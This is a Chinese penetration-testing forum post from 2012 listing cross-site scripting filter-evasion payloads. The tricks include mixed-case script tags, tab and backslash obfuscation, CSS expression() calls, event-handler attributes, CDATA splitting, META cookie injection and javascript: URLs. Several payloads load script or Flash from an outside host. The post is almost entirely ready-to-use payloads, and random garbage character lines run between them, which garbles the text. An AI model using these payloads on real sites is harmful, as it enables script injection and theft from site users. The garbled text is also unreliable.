中国网络渗透测试联盟
标题:
Cross Site Scripting(XSS)攻击手法介绍
[打印本页]
作者:
admin
时间:
2012-12-31 09:59
标题:
Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
6 m v8 ^/ l2 F7 |) k) S
. Q; C. @, a' g: e1 H& H0 e
, d3 o( f. Y& }9 @; x
% ?7 T7 d: X) R+ v U
<sCript>alert(‘d’)</scRipT>
- i k) Z1 L2 ~6 e" G
8 |% _8 ]4 |7 W3 \1 p2 l$ h
2. 利用多加一些其它字符来规避Regular Expression的检查
+ G8 F7 s! ~7 ^4 ~7 E0 p8 ?( Q2 I
3 H! K# l( W9 v1 I% r# P- U
<<script>alert(‘c’)//<</script>
% {' `+ m2 c; V9 _* U. G
! }- z( Y* {; Z# j0 D8 e
<SCRIPT a=">" SRC="t.js"></SCRIPT>
! k- B e$ v1 R$ p$ f* d& ^/ Z
8 I, Y4 V: t* ~' z4 i
<SCRIPT =">" SRC="t.js"></SCRIPT>
' m3 e# d7 z' D
; ~/ l7 j+ Y+ G; e) ?# Z2 f
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
, l& @3 Z7 n3 b. M: G$ r
+ e8 T( D7 ^- i& v
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
, g8 J0 U1 k% [/ D' M% Z
a" [, b6 q' k. L" A" k! F2 r
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
* c3 g( j. x; j; ?
/ q. U' r- W- P; L4 L: j0 o
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
; K8 h' f' k. \1 T: t+ `: W; R1 A7 p
+ d- y" |, {: H4 Y. M$ m% b6 s* e
3. 以其它扩展名取代.js
( g- F. ~& Q. }. B) f% e" H
- p6 A" x- f# i# b% i
<script src="bad.jpg"></script>
" e1 `+ {7 r* d% W* L& v' T$ m
8 \; e) x2 k( u2 o: I5 m% b1 X
4. 将Javascript写在CSS档里
0 H& W" K6 P. [; x, ]5 m* Z
( ?; b6 Q0 P0 O2 M
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
. p9 u5 q& l* n8 U( k
3 o9 P" v9 N8 n* p
example:
; @& N, s2 U) `
$ }* L% F: k3 g" }
body {
. T; r6 h! {( \* D1 I
( a1 m1 b5 ]% @9 o3 m
background-image: url(‘javascript:alert("XSS");’)
' @: u5 v" ?5 P' |9 ~: Z1 H" Z
+ e* ~- A% j& M
}
V) i- q. A5 n/ h
0 Z) s y. q, K, p6 B" Q
5. 在script的tag里加入一些其它字符
5 L2 c% J/ s9 l6 {5 D. ~
v) Y, L! K3 X8 o
<SCRIPT/SRC="t.js"></SCRIPT>
- y" o" U5 |2 n; k6 [3 G7 J, y5 k8 a
9 @+ N z) i) L0 {* d- B
<SCRIPT/anyword SRC="t.js"></SCRIPT>
B, m; A& u7 x* A9 ^
W) I: o7 p0 l. B3 J
6. 使用tab或是new line来规避
. ~6 Y# |, g# C- P, g
* o6 W( e+ o8 g$ M( C8 v
<img src="jav ascr ipt:alert(‘XSS3′)">
* m. K9 R: C+ X/ y0 _/ D0 X5 P p% Y
& o& J5 ?+ g9 q0 W5 L0 i
<img src="jav ascr ipt:alert(‘XSS3′)">
# q' V9 |6 ~ @! a
+ s; l+ l+ M1 |
<IMG SRC="jav ascript:alert(‘XSS’);">
0 u' G0 W5 T' k$ G o8 r9 t, j
3 U. h; U+ F" l9 d1 }
-> tag
( T3 l& |2 r( e8 A* y: x. X5 f
0 B& e: }9 z1 _4 P! V v% p
-> new line
- Q, R, I+ C# B9 r u9 y
' r+ g- \4 k V" k( ]& J/ e4 G6 y
7. 使用"\"来规避
0 v) t# m# p D) c
- H% N2 ^$ B+ u2 S4 }! D) _! e
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
W: y* |0 Q& `; R: J0 Q O X! X J
; X) C, |* o* `" `( c, n$ s
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
t" e$ |% t4 \
5 k* L" j- n0 M: x1 F M9 s
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
/ ]& Z1 q9 ` v' E1 k6 n
! S; S+ p8 H4 @/ N
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
; g' ^2 n" q+ L' z/ {1 J
6 |" V( n- q: V9 ]1 V, ]8 g- j
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
7 f" Y: _4 U0 l/ X5 P2 @
) m- Z1 D+ r8 R3 H
8. 使用Hex encode来规避(也可能会把";"拿掉)
; o. ` g. i1 n7 I6 Q' S# b$ T
3 p: e/ \; p' d1 |
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
+ j$ A5 b3 J3 I* E
; y3 X. {! o# ? |+ ^% f% [/ s
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 I; O% Z4 S8 A7 T
, Z1 l7 e/ Z; x2 x
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
% K* `' L. J0 n
! a7 c$ @2 d* g
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9 |1 X+ M, J" s' K9 ^) H" ~5 r
7 _7 H H( G" S0 |8 _5 U7 x# P+ `2 L
9. script in HTML tag
2 o+ w/ r {7 }& ^3 |
# o# l" d2 |: _$ a* A" \, p+ h
<body onload=」alert(‘onload’)」>
k2 A+ w, O" D, `7 q; C
- ~1 }2 ^: a! y1 B0 ^% V2 v
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
$ G7 D' |& ?. F1 Z
8 b' E2 j% ^, }+ Z1 s. T1 T6 W
10. 在swf里含有xss的code
; h6 j2 f9 n! \" F
/ T# H1 p0 G0 p$ q4 o
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
% K& m, F" O8 @' s! E1 y
3 I6 @- g2 X0 b: `/ w& w L
11. 利用CDATA将xss的code拆开,再组合起来。
) U& s( _) d# {- {7 `- a: \$ n7 y7 Z' T
, r7 K7 y4 B- k- g9 t
<XML ID=I><X><C>
: A. {' \# |5 u- ^
' s% }+ v- W; B L6 i4 t
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
1 V# i0 f4 @9 ?( c+ i
+ [3 ~9 I. ?# y- S |# h7 q0 u7 X
</C></X>
3 J3 q% v7 s& E4 X; y
1 C# y* F4 r$ w' ?6 V1 B
</xml>
# S/ F1 h2 v4 N! f" ?7 d
/ b3 w8 e; C& R9 ?3 ]$ \3 x/ x2 G
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
; s- X' ]9 ~4 w6 j% C
/ _ O" ?% X1 Q' w- ?) X% H
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
b" h# j' V1 X/ O% {
& L" X9 p% C4 o1 Q
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
4 S8 k6 g; U9 B( F, y- l. ~5 h
& Z. R- _6 Q: ~/ S+ ^3 E
12. 利用HTML+TIME。
# x9 A" p3 M5 U9 G
6 F% d4 h4 t! P7 f7 d1 H- ^( U6 I+ n
<HTML><BODY>
1 d6 [/ p n& ^: p
5 F4 m. ~7 Z8 v4 ^& @* [1 D
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
A9 u7 X& Z" q0 Y& F
: l7 x: l/ f" F! V# E9 C
<?import namespace="t" implementation="#default#time2">
$ Z0 d, ]0 G2 n# c
p+ b* w# }3 S9 ?4 N5 N
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
4 Z5 ^0 P8 D4 ~/ K6 V
/ g2 a ]- z) E$ C" W# Z- z
</BODY></HTML>
. Q9 C: J. l i( `5 l, x
& R) W7 A w4 Y$ J) t# y( Q9 x+ d
13. 透过META写入Cookie。
+ L; r& V) l: ^ S6 s' ^
" | B. R* X3 a1 K3 F
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
. Z# S5 R& a+ h# _+ C+ N( e3 {
1 t4 w x" p m/ i5 w8 t- ~. m
14. javascript in src , href , url
, N$ f- u) _+ ^8 H- ~# F9 p( |
, `( \" B+ }% z; f8 C
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
3 K3 Q0 ?# {' K4 Z/ A5 l; P- ^2 ]; C
9 j0 R0 c- L9 M7 L; q% b' k
<img src="javascript:alert(‘XSS3′)">
+ X5 {# c' S+ c) C
[7 s# g0 m& c, ~0 h. j/ T
<IMG DYNSRC="javascript:alert(‘XSS20′)">
% x: J, n. `" j* ^* O- v7 x
5 [6 o* Y5 u* e# J) F* V
<IMG LOWSRC="javascript:alert(‘XSS21′)">
, J/ J8 f3 w# S+ \# t; A3 z! m& N: C
8 i' z- M* }8 {
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
, x" O# @& J$ p
" b% ?! A) y* n2 U
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
* N& ]" k% D# m4 i
2 U) Q! r8 q# a$ w+ \5 v2 q* e
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
. n! t% }$ R/ B% k4 P
: g' M4 `+ L# _) X
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
, _' \- ]" B/ x* w; O J/ N
7 k# V/ {' Y- V: D
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
0 x: u/ C5 u0 e; A, a; h' m( j) B
" t7 M g/ b" e) b
</STYLE><A CLASS=XSS></A>
% k: O- b8 a2 g
- ?! e! a* Q8 Z* m" s
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
. L+ a: g# b$ F9 q" B' g5 L: [3 z2 }
; P- A. `1 E' b
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2